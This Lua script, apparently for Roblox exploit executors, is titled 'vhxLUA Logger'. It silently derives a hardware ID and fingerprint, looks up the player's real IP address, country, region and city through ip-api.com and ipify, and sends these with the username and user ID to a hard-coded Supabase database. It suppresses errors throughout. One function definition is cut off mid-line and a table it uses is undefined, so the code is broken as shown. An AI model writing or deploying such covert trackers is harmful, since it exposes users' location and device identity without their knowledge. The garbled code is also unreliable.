-- ── vhxLUA Logger ─────────────────────────────────────────────
local HttpService = game:GetService("HttpService")
local Players     = game:GetService("Players")
local LP          = Players.LocalPlayer
if not LP then return end

local SUPABASE_URL = "https://aowuatmvtpbwpbzzvtua.supabase.co"
local SUPABASE_KEY = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6ImFvd3VhdG12dHBid3Bienp2dHVhIiwicm9sZSI6ImFub24iLCJpYXQiOjE3NzQxNDQ3MjEsImV4cCI6MjA4OTcyMDcyMX0.PUSrmtZm1eNccfcGlbHTRnuqI7gWExBePBhZQ0apZ4Q"

local function doHttp(t)
    local ok, r = pcall(http_request or http.request, t)
    return ok and r or nil
end

local function req(method, endpoint, body, prefer)
    local headers = {
        ["apikey"]        = SUPABASE_KEY,
        ["Authorization"] = "Bearer " .. SUPABASE_KEY,
        ["Content-Type"]  = "application/json",
    }
    if prefer then headers["Prefer"] = prefer end
    return doHttp({
        Url     = SUPABASE_URL .. endpoint,
        Method  = method,
        Headers = headers,
        Body    = body and HttpService:JSONEncode(body) or nil,
    })
end

-- ── Real HWID ─────────────────────────────────────────────────
local function getHWID()
    if gethwid then
        local ok, id = pcall(gethwid)
        if ok and id and id ~= "" then return tostring(id) end
    end
    if getdeviceid then
        local ok, id = pcall(getdeviceid)
        if ok and id and id ~= "" then return tostring(id) end
    end
    local exec = (identifyexecutor and identifyexecutor()) or "unknown"
    local seed = tostring(LP.UserId) .. exec
    local h = 5381
    for i = 1, #seed do h = ((h * 33) + string.byte(seed, i)) % 4294967295 end
    return string.format("HW-%x", h)
end

-- ── Fingerprint ───────────────────────────────────────────────
local function getFinger    local exec = (identifyexecutor and identifyexecutor()) or "unknown"
    local seed = tostring(LP.UserId) .. exec .. tostring(game.GameId)
    local h = 0
    for i = 1, #seed do h = (h * 31 + string.byte(seed, i)) % 2147483647 end
    return string.format("FP-%x-%d", h, LP.UserId % 99999)
end

-- ── Real IP + Geo (country, region, city) ────────────────────
local function getGeo()
    local ip, country, countryCode, region, city = "", "", "", "", ""

    -- ip-api returns ip + full geo in one call
    local ok, r = pcall(doHttp, {
        Url    = "http://ip-api.com/json/?fields=status,query,country,countryCode,regionName,city",
        Method = "GET",
    })
    if ok and r and r.Body and r.Body ~= "" then
        local ok2, d = pcall(HttpService.JSONDecode, HttpService, r.Body)
        if ok2 and d and d.status == "success" then
            ip          = tostring(d.query       or "")
            country     = tostring(d.country     or "")
            countryCode = tostring(d.countryCode or "")
            region      = tostring(d.regionName  or "")
            city        = tostring(d.city        or "")
        end
    end

    -- Fallback for IP only if geo failed
    if ip == "" then
        for _, url in ipairs({
            "https://api64.ipify.org?format=json",
            "https://api.ipify.org?format=json",
        }) do
            local ok3, r2 = pcall(doHttp, { Url = url, Method = "GET" })
            if ok3 and r2 and r2.Body and r2.Body ~= "" then
                local ok4, d2 = pcall(HttpService.JSONDecode, HttpService, r2.Body)
                if ok4 and d2 and (d2.ip or d2.query) then
                    ip = tostring(d2.ip or d2.query)
                    break
                end
            end
        end
    end

    return ip, country, countryCode, region, city
end

-- ── Run ───────────────────────────────────────────────────────
task.spawn(function()
    local ok, err = pcall(function()
        local hwid = getHWID()
        local fp   = getFingerprint()
        local ip, country, countryCode, region, city = getGeo()
        local now  = os.date("!%Y-%m-%dT%H:%M:%SZ")

        -- ── Upsert unique_users via RPC (atomic increment) ─────
        local upsertRes = req("POST", "/rest/v1/rpc/upsert_user_execution", {
            p_user_id      = LP.UserId,
            p_username     = LP.Name,
            p_place_id     = game.PlaceId,
            p_game_name    = GAMES[game.PlaceId] or "",
            p_fingerprint  = fp,
            p_hwid         = hwid,
            p_ip           = ip,
            p_now          = now,
            p_country      = country,
            p_country_code = countryCode,
            p_region       = region,
            p_city         = city,
        })

        -- ── Increment game_executions ─────────────────────────
        local execRes = req("POST", "/rest/v1/rpc/increment_game_exec", {
            p_place_id  = game.PlaceId,
            p_game_name = GAMES[game.PlaceId] or "",
        })

        -- ── Store in env ──────────────────────────────────────
        if getgenv then
            getgenv()._vhxHWID = hwid
            getgenv()._vhxFP   = fp
        end
    end)

    if not ok then
    end
end)
